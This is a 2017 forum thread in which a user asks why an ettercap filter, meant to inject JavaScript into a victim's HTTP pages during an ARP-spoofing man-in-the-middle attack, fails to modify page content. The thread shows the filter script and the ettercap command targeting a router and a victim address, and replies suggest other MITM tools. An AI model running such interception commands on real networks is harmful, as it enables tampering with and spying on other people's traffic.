kdlsw Posted April 9, 2017 Share Posted April 9, 2017 I'm trying to perform a javascript injection with ettercap 0.8.2 and its filter, but it did not work. All the relevant topics I found are before 2016, I am not sure if this kind of attack still works now? Anyway, this is my filter script if (ip.proto == TCP && tcp.dst == 80) { if (search(DATA.data, "Accept-Encoding")) { replace("Accept-Encoding", "Accept-Nothing!"); msg("zapped Accept-Encoding!\n"); } } if (ip.proto == TCP && tcp.dst == 80) { if (search(DATA.data, "<head>")) { replace("<head>", "<HEAD>"); msg("Code injected"); } } And I run it as ettercap -T -q -i wlan0 -F test.ef -M arp:remote /192.168.0.1// /192.168.0.100// test.ef is the compiled filter file. When the victim opens any web page, I got a lot of "zapped Accept-Encoding!" messages, but no "Code injected", and of course the html source code on the victim side is untouched. The part I really don't understand is, if I remove the search condition for the second part, if (ip.proto == TCP && tcp.dst == 80) { replace("<head>", "<HEAD>"); msg("Code injected"); } "Code injected" message shows, but html code on the web client is not changed, which means, the problem is that the filter cannot find any named strings (in this case <head>) in the html file, it can only deal with the header (Accept-Encoding). Does anyone know a solution or work around, please, any suggestions will be appreciated, thanks Quote Link to comment Share on other sites More sharing options...
0phoi5 Posted April 10, 2017 Share Posted April 10, 2017 I've had recent success with Ettercap and Driftnet, so that basic aspect still works for unencrypted traffic, but haven't tried code injection using Ettercap any time recently. Quote Link to comment Share on other sites More sharing options...
digip Posted April 10, 2017 Share Posted April 10, 2017 There is also bettercap. Quote Link to comment Share on other sites More sharing options...
kdlsw Posted April 10, 2017 Author Share Posted April 10, 2017 @digipThanks, I will look into that. so many options for mitm these days, I just tested MITMF, another similar tool, which didn't work for me too well, hope this one is good. Thank you. Quote Link to comment Share on other sites More sharing options...
digip Posted April 10, 2017 Share Posted April 10, 2017 2 hours ago, kdlsw said: @digipThanks, I will look into that. so many options for mitm these days, I just tested MITMF, another similar tool, which didn't work for me too well, hope this one is good. Thank you. If you're using Kali, a lot of these tools should be installed, and if not, are in the repo and should all work once installed, dependencies as well. Often its something simple though, like forgetting to add a switch or IP forward for a tool like mitm attacks. Quote Link to comment Share on other sites More sharing options...
kdlsw Posted April 11, 2017 Author Share Posted April 11, 2017 10 hours ago, digip said: If you're using Kali, a lot of these tools should be installed, and if not, are in the repo and should all work once installed, dependencies as well. Often its something simple though, like forgetting to add a switch or IP forward for a tool like mitm attacks. Thank you, this is helpful! I will try it! Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.